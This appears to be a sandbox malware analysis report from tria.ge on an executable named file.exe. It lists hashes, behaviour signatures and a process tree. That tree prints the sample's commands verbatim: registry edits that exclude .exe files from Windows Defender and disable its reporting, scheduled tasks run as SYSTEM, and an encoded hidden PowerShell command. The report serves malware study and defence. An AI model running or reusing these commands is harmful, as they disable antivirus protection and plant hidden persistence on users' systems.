Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    130s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/10/2022, 12:33

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    4c3bf9f44cb3b0beafd4fdbe47a64eeb

  • SHA1

    fc3dfad3a7e2197857a94514a186bfcfeeaf6b00

  • SHA256

    324edc8acd355934c63a1fcaa6c4793d681302fa49d4f5233eaeafdc366e34ab

  • SHA512

    36cacdb10d8da5f6c5fbf0c176db314cfb23ff15154f95d3a07038e191ffeece9467feed41a3294a25797937d5ce60c197fc0ca554895b54c68381f261ec4622

  • SSDEEP

    196608:91O/pWMv3UnNQzQSlz+qCpqFWoYICsTs7YT5OS++5TM8pPwGt:3OxWRnN7SYZIjTsq5OSw2t

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Users\Admin\AppData\Local\Temp\7zS6C8A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Users\Admin\AppData\Local\Temp\7zS7053.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3668
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2548
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3324
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:4264
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3380
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3104
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4572
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4928
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4832
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gSmiMIuyi" /SC once /ST 13:00:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1352
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gSmiMIuyi"
                  4⤵
                    PID:3448
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gSmiMIuyi"
                    4⤵
                      PID:1816
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\VvVnnyM.exe\" JF /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:816
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1844
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3548
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:3432
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:4060
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1136

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\7zS6C8A.tmp\Install.exe

                        Filesize

                        6.3MB

                        MD5

                        3e2c486c6b397a3c96c5ae6c30de7924

                        SHA1

                        beafeb2d21677cb2183f250812051fbc75527f4e

                        SHA256

                        8dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f

                        SHA512

                        541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393

                      • C:\Users\Admin\AppData\Local\Temp\7zS6C8A.tmp\Install.exe

                        Filesize

                        6.3MB

                        MD5

                        3e2c486c6b397a3c96c5ae6c30de7924

                        SHA1

                        beafeb2d21677cb2183f250812051fbc75527f4e

                        SHA256

                        8dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f

                        SHA512

                        541ddbb71bb2e86b69cf637fbcc0f87417189fee4f60f2b67799476f2f858fa847d44c5e4f6ea15aa9f07b589210f68a5ab565f531f81ef9fab2071a535f2393

                      • C:\Users\Admin\AppData\Local\Temp\7zS7053.tmp\Install.exe

                        Filesize

                        7.0MB

                        MD5

                        8c94340110f911923720019e038dbc4d

                        SHA1

                        534f1f1415337ac1147881432930c35a25206735

                        SHA256

                        e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad

                        SHA512

                        8accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba

                      • C:\Users\Admin\AppData\Local\Temp\7zS7053.tmp\Install.exe

                        Filesize

                        7.0MB

                        MD5

                        8c94340110f911923720019e038dbc4d

                        SHA1

                        534f1f1415337ac1147881432930c35a25206735

                        SHA256

                        e726dff33704003648f7aa836abf4557b812dee36908ec55366d882a51ee0dad

                        SHA512

                        8accf7ee26fa9ac60ac4dd89152756f420ea06eba035a9b6782c05f14366f82ca76bec84a54a853071f34b1bc36bd1c31887656a06e378a487e7fe066c476fba

                      • memory/1844-152-0x00007FFA05D10000-0x00007FFA067D1000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1844-151-0x000001695DF00000-0x000001695DF22000-memory.dmp

                        Filesize

                        136KB

                      • memory/1844-154-0x00007FFA05D10000-0x00007FFA067D1000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3668-138-0x0000000010000000-0x0000000011000000-memory.dmp

                        Filesize

                        16.0MB